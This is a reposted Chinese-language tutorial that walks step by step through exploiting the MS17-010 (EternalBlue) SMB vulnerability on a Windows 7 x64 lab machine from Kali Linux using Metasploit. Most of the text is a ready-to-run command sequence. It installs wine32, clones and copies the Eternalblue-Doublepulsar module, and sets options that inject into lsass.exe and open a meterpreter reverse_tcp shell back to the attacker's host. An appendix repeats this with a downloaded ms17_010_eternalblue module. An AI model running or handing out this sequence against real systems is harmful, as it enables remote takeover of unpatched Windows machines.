碼上歡樂
相關內容    簡體    繁體

永恆之藍msf下 ms17_010 (64位kali下安裝wine32)

本文轉載自   查看原文   2017-12-29 17:31   6985    kail linux滲透技術

本次用到的環境:

kali(2016.2)32位系統.ip地址:192.168.1.104

目標靶機為:win7sp1x64系統(關閉防火牆),ip地址:192.168.1.105

 

=================================

若kali為64位

windows為32

需要安裝wine32 ,但64位的kali下無法apt-get install wine32

在執行exploit時會出現 :

it looks like wine32 is missing, you should install it.
multiarch needs to be enabled first. as root, please
execute "dpkg --add-architecture i386 && apt-get update &&
apt-get install wine32"

 

 

按照上面的方法dpkg --add-architecture i386 && apt-get update &&
apt-get install wine32即可

 

=================================

具體的步驟如下:

kali系統下安裝wine32:

apt-get install wine32

 

 

用wine32執行cmd.exe

wine cmd.exe

 

exit        //退出

 

 git  clone下載其利用腳本:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后將腳本拷貝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

cd    Eternalblue-Doublepulsar-Metasploit/
cp  -r  deps/  eternalblue_doublepulsar.rb    /usr/share/metasploit-framework/modules/exploits/windows/smb

 

啟動msf,然后進行一系列設置:

service postgresql start

msfconsole

 

 

search  eternalblue

use  exploit/windows/smb/eternalblue_doublepulsar

 

復制代碼 
 set   DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

  set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

set PROCESSINJECT   lsass.exe

set TARGETARCHITECTURE  x64

set rhost  192.168.1.105

show targets

set target 9

set payload windows/x64/meterpreter/reverse_tcp

show options

set lhost 192.168.1.104

exploit
復制代碼

 

 

附錄:

msf下的ms17-010模塊:

前提條件:

1. gem install ruby_smb #ruby_smb模塊安裝

2.msfupdate   #msf的更新

3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"  #啟動並加載模塊

 

復制代碼 
root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb

Use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8

msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21

msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) >exploit

Meterpreter> sysinfo
復制代碼

 

 

 

 

 轉載:https://www.cnblogs.com/backlion/p/6804863.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Msf--永恆之藍 ms17_010 ms17_010(永恆之藍)漏洞復現詳細教程 kali ms17_010 內網環境下滲透筆記 ms17_010利用復現(32位) 永恆之藍漏洞利用windows7、windows2003——MS17_010 利用永恆之藍漏洞(ms17_010)滲透攻擊windows MS17-010永恆之藍驗證 23.通過MS17_010來學習msf對滲透的利用 MSF里MS17_010利用模塊筆記 MSF下ms17_010_psexec模塊使用技巧
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM